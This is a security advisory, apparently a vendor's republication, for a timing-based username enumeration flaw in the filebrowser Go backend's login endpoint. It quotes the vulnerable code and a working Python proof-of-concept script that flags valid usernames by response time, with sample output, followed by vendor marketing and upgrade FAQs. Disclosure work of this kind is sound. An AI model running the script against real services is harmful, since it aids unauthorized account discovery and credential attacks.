Summary
The /api/auth/login authentication endpoint does not execute in constant time. When a non-existent username is supplied, the server returns a 401/403 response almost immediately. When a valid username is provided, the server performs a bcrypt password comparison, causing a measurable delay in the response time.
Details
The vulnerability exists in the Auth function of JSONAuth in auth/json.go (lines 45–52). The function performs a database lookup for the user prior to performing any password validation.
user, err := userStore.Get(username)
if err != nil {
return nil, fmt.Errorf("unable to get user from store: %v", err)
}
err = users.CheckPwd(password, user.Password)
if err != nil {
return nil, err
}
If the username is not found, the function returns an error immediately. If the username is found, the function calls CheckPwd, which executes the bcrypt hash comparison. Because bcrypt is intentionally computationally expensive, this introduces a measurable delay in the response time.
As a result, an attacker can distinguish valid usernames from invalid ones by measuring the authentication response times.
In testing, responses for valid usernames consistently required approximately 40–50 ms due to the bcrypt comparison, while invalid usernames returned in approximately 1–4 ms.
PoC
The script below automates this attack by calibrating the network latency using non-existent usernames to establish a baseline and then testing a list of target users. Valid usernames are detected when the response time exceeds the baseline.
import requests
import time
import statistics
# Configuration - adjust domain and wordlist as appropriate
TARGET_URL = "http://localhost/api/auth/login"
WORDLIST = ["admin", "root", "user2", "nonexistent_test_user"]
def measure(username):
start = time.perf_counter()
requests.post(TARGET_URL, params={"username": username}, headers={"X-Password": "wrong-password"})
return time.perf_counter() - start
# 1. Baseline Calibration
print("[*] Calibrating...")
baselines = [measure(f"not_a_user_{i}") for i in range(20)]
threshold = statistics.mean(baselines) + (statistics.stdev(baselines) * 5)
print(f"[*] Baseline: {statistics.mean(baselines):.4f}s | Threshold: {threshold:.4f}s")
# 2. Validation Test
for user in WORDLIST:
t = measure(user)
status = "VALID" if t > threshold else "invalid"
print(f"{user:<15} | {t:.4f}s | {status}")
Example output (with admin and user2 configured as valid users in the application):
$ python timeattack.py
[*] Calibrating...
[*] Baseline: 0.0041s | Threshold: 0.0256s
admin | 0.0505s | VALID
root | 0.0019s | invalid
user2 | 0.0464s | VALID
nonexistent_test_user | 0.0015s | invalid
Impact
An unauthenticated attacker can enumerate valid usernames by measuring authentication response times.
GHSA-7789-65HX-F26W has a CVSS score of 5.3 (Medium). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.0.0-20260317230626-af08800667b8); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is GHSA-7789-65HX-F26W? GHSA-7789-65HX-F26W is a medium-severity security vulnerability in github.com/gtsteffaniak/filebrowser/backend (go), affecting versions < 0.0.0-20260317230626-af08800667b8. It is fixed in 0.0.0-20260317230626-af08800667b8.
- How severe is GHSA-7789-65HX-F26W? GHSA-7789-65HX-F26W has a CVSS score of 5.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/gtsteffaniak/filebrowser/backend are affected by GHSA-7789-65HX-F26W? github.com/gtsteffaniak/filebrowser/backend (go) versions < 0.0.0-20260317230626-af08800667b8 is affected.
- Is there a fix for GHSA-7789-65HX-F26W? Yes. GHSA-7789-65HX-F26W is fixed in 0.0.0-20260317230626-af08800667b8. Upgrade to this version or later.
- Is GHSA-7789-65HX-F26W exploitable, and should I be worried? Whether GHSA-7789-65HX-F26W is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-7789-65HX-F26W is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-7789-65HX-F26W? Upgrade
github.com/gtsteffaniak/filebrowser/backendto 0.0.0-20260317230626-af08800667b8 or later.